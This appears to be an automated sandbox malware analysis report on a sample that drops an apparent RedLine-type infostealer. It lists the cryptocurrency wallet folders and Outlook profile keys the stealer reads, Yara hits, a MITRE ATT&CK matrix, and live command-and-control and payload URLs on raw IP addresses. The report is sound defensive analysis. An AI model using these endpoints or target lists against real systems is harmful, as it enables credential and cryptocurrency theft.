                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                            Source: Yara match File source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000018.00000002.3282767064.0000000000ABB000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED

                            Remote Access Functionality

                            Source: Yara match File source: 2.2.u3z0.0.exe.41c0e67.1.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 2.2.u3z0.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 2.2.u3z0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 2.3.u3z0.0.exe.41f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 2.3.u3z0.0.exe.41f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara match File source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000013.00000000.2454770621.0000013E34F8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Source: Yara match File source: 00000013.00000000.2454770621.0000013E31D8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Source: Yara match File source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED
                            Source: Yara match File source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe, Code function: 2_2_6C930C40 sqlite3_bind_zeroblob, 2_2_6C930C40
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 341 Windows Management Instrumentation | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | 1 Windows Service | 11 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 22 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 1 Windows Service | 1 Abuse Elevation Control Mechanism | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 312 Process Injection | 3 Obfuscated Files or Information | NTDS | 286 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Software Packing | LSA Secrets | 551 Security Software Discovery | SSH | Keylogging | 124 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 DLL Side-Loading | Cached Domain Credentials | 351 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 351 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph. ID: 1430187, Sample: 4BfhCycV4B.exe, Start date: 23/04/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
4BfhCycV4B.exe | 39% | Virustotal | | Browse
4BfhCycV4B.exe | 100% | Avira | HEUR/AGEN.1313018 |
4BfhCycV4B.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\fak | 100% | Avira | HEUR/AGEN.1307453 |
C:\Users\user\AppData\Local\Temp\fak | 100% | Joe Sandbox ML | |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll | 18% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\fak | 59% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine |
C:\Users\user\AppData\Local\Temp\u3z0.1.exe | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\ypbquxnwo | 59% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine |
C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll | 18% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll | 0% | ReversingLabs | |
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
note.padd.cn.com | 1% | Virustotal | | Browse
windowsupdatebg.s.llnwi.net | 0% | Virustotal | | Browse
download.iolo.net | 0% | Virustotal | | Browse
fp2e7a.wpc.phicdn.net | 0% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://www.indyproject.org/ | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
http://ocsp.thawte.com0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
iolo0.b-cdn.net | 185.93.1.244 | true | false | | high
note.padd.cn.com | 176.97.76.106 | true | false | | unknown
svc.iolo.com | 20.157.87.45 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown
windowsupdatebg.s.llnwi.net | 69.164.42.0 | true | false | | unknown
download.iolo.net | unknown | unknown | true | | unknown
westus2-2.in.applicationinsights.azure.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://185.172.128.228/BroomSetup.exe | false | | unknown
http://185.172.128.76/3cd2b41cbde8fc9c.php | true | | unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll | true | | unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll | true | | unknown
http://185.172.128.59/syncUpd.exe | false | | unknown
http://note.padd.cn.com/1/Qg_Appv5.exe | false | | unknown
http://185.172.128.76/15f649199f40275b/nss3.dll | true | | unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll | true | | unknown
http://185.172.128.228/ping.php?substr=eight | false | | unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll | true | | unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                        unknown
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666BSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://dc.services.visualstudio.com/fSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4FMSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://support.iolo.com/support/solutions/articles/44SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.symauth.com/rpa00Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://185.172.128.76/3cd2b41cbde8fc9c.php)u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.newtonsoft.com/jsonschemaSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLu3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.info-zip.org/Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.000000000348F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.iolo.com/company/legal/eula/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://185.172.128.76u3z0.0.exe, 00000002.00000002.2435497430.00000000043DE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  unknown
                                                                                                                                                  http://dejavu.sourceforge.net/wiki/index.php/LicenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://scripts.sil.org/OFLThisSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://scripts.sil.org/OFLinsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/itfoundry/Poppins)&&&&zSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/itfoundry/Poppins)SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://185.172.128.76/3cd2b41cbde8fc9c.phpAu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://github.com/itfoundry/Poppins)&&&&vSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://ocsp.sectigo.com04BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://185.172.128.76/15f649199f40275b/softokn3.dllcu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.iolo.com/company/legal/eula/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.newtonsoft.com/jsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://google.com4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://185.172.128.76/3cd2b41cbde8fc9c.php-minuser-l1-1-0u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.codeplex.com/prismSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://185.172.128.76/3cd2b41cbde8fc9c.phpau3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://crl.thawte.com/ThawteTimestampingCA.crl0Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.monSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phpfu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://compositewpf.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://sectigo.com/CPS0D4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://185.172.128.76/3cd2b41cbde8fc9c.phpMu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitorSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/LicSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://185.172.128.76/3cd2b41cbde8fc9c.phpQu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://185.172.128.76/3cd2b41cbde8fc9c.phpYu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06u3z0.1.exe, 00000009.00000003.2649676502.0000000002664000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://www.sqlite.org/copyright.html.u3z0.0.exe, 00000002.00000002.2468091065.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://github.com/JamesNK/Newtonsoft.JsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://91.215.85.66:9000MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://sectigo.com/CPS04BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
